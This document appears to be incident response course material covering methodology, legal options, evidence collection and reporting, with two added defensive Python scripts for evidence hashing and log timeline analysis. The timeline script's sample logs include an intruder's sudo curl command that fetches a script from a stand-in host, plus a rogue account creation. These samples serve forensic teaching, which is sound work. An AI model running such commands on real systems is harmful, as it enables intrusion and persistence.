Incident Response Methodology
Introduction
Incident response is the methodology an organization uses to respond to and manage a cyber attack.
An attack or data breach can potentially affect customers, intellectual property, company time and resources, and brand value. Incident response aims to reduce this damage and recover as quickly as possible.
Investigation is also a key component, in order to learn from the attack and better prepare for the future. Because many companies today experience a breach at some point in time, a well-developed and repeatable incident response plan is the best way to protect your company.
What is an Incident?
An incident can be defined as any event that disrupts the normal operating procedures and leads to some level of crisis, which may further result in financial, operational, reputational and legal impacts on the organization.
Some computer security incidents that can interrupt the smooth functioning of a business are:
● Worm Infection
● Windows / Unix Intrusions
● DDoS
● Website Defacement
● Social Engineering
● Information Leakage
● Phishing
Components of an Incident
● Event:
○ An event is any occurrence of an unexpected change, for example a system crash.
● Incident Response Team:
○ The incident response team includes individuals with the expertise necessary to properly assess the incident and make decisions regarding the proper course of action.
● Incident Response Methodology:
○ In order to properly assess the incident and make the right decisions about it, we need a plan. A response methodology is a systematic method, or simply a set of guidelines, that must be followed when an incident occurs.
● Incident Investigation:
○ To determine the course of the incident, to collect evidence, and to produce that evidence in court during a trial, we need to do thorough research.
Incident Response Team
An incident response team is a group of people who are forensics experts and are always prepared to respond to any emergency incident, such as a natural disaster or an interruption of business operations due to cyber-crime.
Objectives of the incident response team:
● Confirm that an incident has occurred and that systems were compromised
● Maintain or restore business continuity
● Lessen the incident's impact
● Try to find out how the attack was done
● Take preventive steps against future incidents
● Improve the security and incident response approach
Incident Response Methodology
● Pre-incident preparation
● Detection of incidents
● Initial response
● Formulate response strategy
● Investigate the incident
● Reporting
● Resolution
Detection of Incidents
If an organization cannot detect incidents effectively, it cannot succeed in responding to them. Therefore, the detection-of-incidents phase is one of the most important aspects of incident response. It is also one of the most decentralized phases, in which those with incident response expertise have the least control.
Organizations must have a well-documented and simple mechanism for reporting incidents. This is critical to establishing accurate metrics, which are often required to obtain the proper budget for an organization's incident response capability.
Formulate a Response Strategy
● The goal of the response strategy formulation phase is to determine the most appropriate response strategy, given the circumstances of the incident.
● The strategy should take into consideration the political, technical, legal, and business factors that surround the incident.
● The final solution depends on the objectives of the group or individual with responsibility for selecting the strategy.
The following important points should be considered:
1. Considering the Totality of the Circumstances
2. Considering Appropriate Responses
3. Taking Action
   i. Legal Action
   ii. Administrative Action
1. Considering the Totality of the Circumstances
Response strategies will vary based on the circumstances of the computer security
incident.
The following factors need to be considered when deciding how many resources are
needed to investigate an incident and other aspects of your response strategy:
➢ How critical are the affected systems?
➢ How sensitive is the compromised or stolen information?
➢ Who are the potential perpetrators?
➢ Is the incident known to the public?
➢ What is the level of unauthorized access attained by the attacker?
➢ What is the apparent skill of the attacker?
➢ How much system and user downtime is involved?
➢ What is the overall dollar loss?
1. Considering the Totality of the Circumstances
Details obtained during the initial response can be critical when choosing a response
strategy.
For example, a DoS attack originating from a university may be handled much differently
from how an equivalent DoS attack originating from a competitor is handled. Before the
response strategy is chosen, it may become necessary to reinvestigate details of the
incident.
Factors other than the details of the incident will contribute to the response strategy.
Most notably, your organization’s response posture plays a large role in your response
strategy. Your response posture is your capacity to respond, determined by your
technical resources, political considerations, legal constraints, and business objectives.
2. Considering Appropriate Responses
The following table shows some common situations with response strategies and potential outcomes. As you can see, the response strategy determines how you get from an incident to an outcome.
3. Taking Action
An organization will need to take action to discipline an employee or to respond to a
malicious act by an outsider. When the incident warrants, this action can be initiated with
a criminal referral, a civil complaint, or some administrative reprimand or privilege
revocation.
Legal Action: It is not uncommon to investigate a computer security incident that is
actionable, or could lead to a lawsuit or court proceeding. The two potential legal choices
are to file a civil complaint or to notify law enforcement. Law enforcement involvement
will reduce the autonomy that your organization has in dealing with an incident, and
careful deliberation should occur before you engage the appropriate authorities. In cases
where your organization feels compelled to notify law enforcement, you may want to
determine the amount of effort and resources you want to invest in the investigation
before bringing in a law enforcement agency.
3. Taking Action
The following criteria should be considered when deciding whether to include law
enforcement in the incident response:
➢ Does the damage/cost of the incident merit a criminal referral?
➢ Is it likely that civil or criminal action will achieve the outcome desired by your
organization? (Can you recover damages or receive restitution from the offending
party?)
➢ Has the cause of the incident been reasonably established? (Law enforcement
officers are not computer security professionals.)
➢ Does your organization have proper documentation and an organized report that
will be conducive to an effective investigation?
➢ Can tangible investigative leads be provided to law enforcement officials for them to
act on?
➢ Is your organization willing to risk public exposure?
➢ Does the past performance of the individual merit any legal action?
➢ How will law enforcement involvement impact business operations?
3. Taking Action
Administrative Action: Disciplining or terminating employees via administrative
measures is currently more common than initiating civil or criminal actions. Some
administrative actions that can be implemented to discipline internal employees include
the following:
➢ Letter of reprimand
➢ Immediate dismissal
➢ Mandatory leave of absence for a specific length of time (paid or unpaid)
➢ Reassignment of job duties (diminished responsibility)
➢ Temporary reduction in pay to account for losses/damage
➢ Public/private apology for actions conducted
➢ Withdrawal of certain privileges, such as network or web access
Data Collection
Data collection is the accumulation of facts and clues that should be considered during your forensic analysis. The data you collect forms the basis of your conclusions. Data collection involves several unique forensic challenges:
● You must collect electronic data in a forensically sound manner.
● You are often collecting more data than you can read in your lifetime (computer storage capacity continues to grow).
● You must handle the data you collect in a manner that protects its integrity (evidence handling).
Host-based Information: Host-based evidence includes logs, records, documents, and any other information that is found on a system and not obtained from network-based nodes. For example, host-based information might be a system backup that harbors evidence from a specific period in time.
Network-based Evidence: Network-based evidence includes information obtained from sources such as IDS logs, consensual monitoring logs, non-consensual wiretaps, pen-register/trap-and-trace records, router logs, firewall logs, and authentication servers.
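The "forensically sound" and "protects its integrity" requirements in the Data Collection slides are normally met by hashing each evidence item at acquisition and recording every hand-off. The script below is an added example written for this page, not code from the slides or their author: it hashes a constructed sample log (a host-based item), keeps an append-only chain-of-custody record, and shows how a later modification of the file (here, appending a single byte, which is what opening evidence in write mode rather than read-only can do) is caught by re-verification against the acquisition hash. The file name, analyst name and log content are constructed.

```python
"""Evidence integrity and chain-of-custody record for collected host data (added example)."""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1024 * 1024  # hash large images and logs without loading them into memory


def hash_bytes(data: bytes) -> str:
    """SHA-256 of an in-memory item (e.g. a captured message)."""
    return hashlib.sha256(data).hexdigest()


def hash_file(path: str) -> str:
    """SHA-256 of a file, read in chunks and opened read-only so hashing cannot alter it."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


class CustodyLog:
    """Append-only record: who did what to which evidence item, and its hash at that moment."""

    def __init__(self):
        self.entries = []

    def record(self, item: str, actor: str, action: str, digest: str, note: str = "") -> dict:
        entry = {
            "time": datetime.now(timezone.utc).isoformat(),
            "item": item,
            "actor": actor,
            "action": action,
            "sha256": digest,
            "note": note,
        }
        self.entries.append(entry)  # entries are never edited or removed, only appended
        return entry

    def acquisition_hash(self, item: str):
        """The hash recorded when the item was first acquired; everything later is checked against it."""
        for e in self.entries:
            if e["item"] == item and e["action"] == "acquired":
                return e["sha256"]
        return None

    def verify(self, item: str, path: str) -> bool:
        expected = self.acquisition_hash(item)
        return expected is not None and hash_file(path) == expected

    def to_json(self) -> str:
        return json.dumps(self.entries, indent=2)


def demo() -> tuple:
    """Constructed scenario: acquire a log, verify it, then detect an accidental modification."""
    log = CustodyLog()
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "auth.log")  # constructed sample, not real evidence
        with open(path, "wb") as f:
            f.write(b"Jan 12 03:14:07 web01 sshd[2211]: Failed password for root from 203.0.113.5\n")
        log.record("auth.log", "analyst-1", "acquired", hash_file(path), "copied from host, read-only")
        intact = log.verify("auth.log", path)            # True: file matches acquisition hash
        with open(path, "ab") as f:                      # unsound handling: the file is changed
            f.write(b"\n")
        after_change = log.verify("auth.log", path)      # False: integrity check now fails
        log.record("auth.log", "analyst-1", "verified", hash_file(path),
                   "mismatch: file altered after acquisition")
    return intact, after_change, len(log.entries)


if __name__ == "__main__":
    print(demo())  # (True, False, 2)
```

In practice the custody log itself is stored separately from the evidence and signed or hashed in turn, so that a tampered record cannot simply be rewritten to match a tampered file.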
Forensic Analysis
In the aftermath of a security incident or breach, clients often need security experts to carry out an incident response plan and perform forensic analysis.
Forensic analysis includes reviewing all the data collected. This includes reviewing log files, system configuration files, trust relationships, web browser history files, email messages and their attachments, installed applications, and graphic files. You perform software analysis, review time/date stamps, perform keyword searches, and take any other necessary investigative steps.
Forensic analysts also prepare digital evidence that is admissible in court, and work hand in hand with law enforcement and our clients on evidence gathering.
Performing Forensic Analysis
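Reviewing time/date stamps and running keyword searches, as the Forensic Analysis slide describes, is far easier once host-based and network-based evidence sit on a single timeline. The script below is an added example, not code from the slides or their author: it parses two constructed log formats (classic syslog, which omits the year, and an ISO-timestamped firewall log), merges them into one UTC-sorted timeline, runs a case-insensitive keyword search, and pulls the events from every source around a hit so the analyst can pivot between host and network evidence. All hosts, addresses, times and the assumed syslog year are constructed.

```python
"""Build one UTC timeline from host and network log lines, then search and pivot on it (added example)."""
import re
from datetime import datetime, timedelta, timezone
from typing import List, Optional

# Constructed sample evidence (not from any real incident): one ISO-format firewall log
# and one classic syslog, as an analyst might hold after data collection.
SAMPLE_LINES = [
    "2024-01-12T03:13:55Z fw01 ALLOW TCP 203.0.113.5:51022 -> 10.0.0.7:22",
    "Jan 12 03:14:07 web01 sshd[2211]: Accepted password for admin from 203.0.113.5 port 51022 ssh2",
    "Jan 12 03:15:40 web01 sudo: admin : TTY=pts/0 ; COMMAND=/usr/bin/curl http://example.invalid/x.sh",
    "2024-01-12T03:15:41Z fw01 DENY TCP 10.0.0.7:44010 -> 198.51.100.9:80",
    "Jan 12 03:16:02 web01 useradd[2290]: new user: name=backup_svc, UID=1003",
]
# Classic syslog has no year; take it from the acquisition record (assumed value here).
SYSLOG_YEAR = 2024

SYSLOG_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) (?P<msg>.*)$")
ISO_RE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\dZ) (?P<host>\S+) (?P<msg>.*)$")


def parse_line(line: str) -> Optional[dict]:
    """Normalize one line to a UTC-stamped event, or None if the format is unknown."""
    m = ISO_RE.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        return {"time": ts, "host": m["host"], "source": "network", "msg": m["msg"], "raw": line}
    m = SYSLOG_RE.match(line)
    if m:
        # The host clock is assumed to be UTC; any known offset or skew belongs in the report.
        ts = datetime.strptime(f"{SYSLOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S").replace(tzinfo=timezone.utc)
        return {"time": ts, "host": m["host"], "source": "host", "msg": m["msg"], "raw": line}
    return None


def unparsed_lines(lines: List[str]) -> List[str]:
    """Lines the parser could not place on the timeline; report them, never drop them silently."""
    return [l for l in lines if parse_line(l) is None]


def build_timeline(lines: List[str]) -> List[dict]:
    """Merge all parsable lines from every source and order them by time."""
    events = [e for e in map(parse_line, lines) if e is not None]
    events.sort(key=lambda e: e["time"])
    return events


def keyword_search(events: List[dict], keywords: List[str]) -> List[dict]:
    """Case-insensitive search over the message field (usernames, addresses, tool names, ...)."""
    kws = [k.lower() for k in keywords]
    return [e for e in events if any(k in e["msg"].lower() for k in kws)]


def context_window(events: List[dict], hit: dict, seconds: int = 120) -> List[dict]:
    """All events from all sources within +/- `seconds` of a hit, for host/network pivoting."""
    lo, hi = hit["time"] - timedelta(seconds=seconds), hit["time"] + timedelta(seconds=seconds)
    return [e for e in events if lo <= e["time"] <= hi]


def render(events: List[dict]) -> List[str]:
    """One fixed-width line per event, suitable for pasting into a report."""
    return [f"{e['time'].isoformat()}  {e['source']:<7}  {e['host']:<6}  {e['msg']}" for e in events]


if __name__ == "__main__":
    timeline = build_timeline(SAMPLE_LINES)
    print("\n".join(render(timeline)))
    for hit in keyword_search(timeline, ["useradd", "curl"]):
        print("\nHIT:", hit["raw"])
        print("\n".join(render(context_window(timeline, hit))))
```

The two-minute window around the `useradd` hit brings the firewall's earlier ALLOW and the SSH login onto the same screen as the host event, which is the kind of cross-source correlation the slide's "review time/date stamps" step is after; keep `unparsed_lines` in the report so that nothing the parser skipped goes unmentioned.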
Reporting
Reporting can be the most difficult phase of the incident response process. The challenge is to create reports that accurately describe the details of an incident, that are understandable to decision makers, that can withstand the barrage of legal scrutiny, and that are produced in a timely manner.
Reports are also often used by investigators to refresh their recollections during criminal trials and in training employees new to the field of computer forensics.
Some guidelines for writing reports:
● Document immediately
● Write concisely and clearly
● Use a standard format
● Use editors
● Document immediately: All investigative steps and conclusions need to be documented as soon as possible. Writing something clearly and concisely at the moment you discover evidence saves time, promotes accuracy, and ensures that the details of the investigation can be communicated more clearly to others at any moment, which is critical if new personnel become involved or are assigned to lead the investigation.
● Write concisely and clearly: Enforce the "write it tight" philosophy. Documenting investigative steps requires discipline and organization. Write everything down in a fashion that is understandable to you and others. Discourage shorthand or shortcuts.
● Use a standard format: Develop a format for your reports and stick to it. Create forms, outlines, and templates that organize the response process and encourage the recording of all relevant data.
● Use editors: Employ technical editors to read your forensic reports. This helps develop reports that are comprehensible to non-technical personnel who have an impact on your incident response strategy and resolution.
Thank You
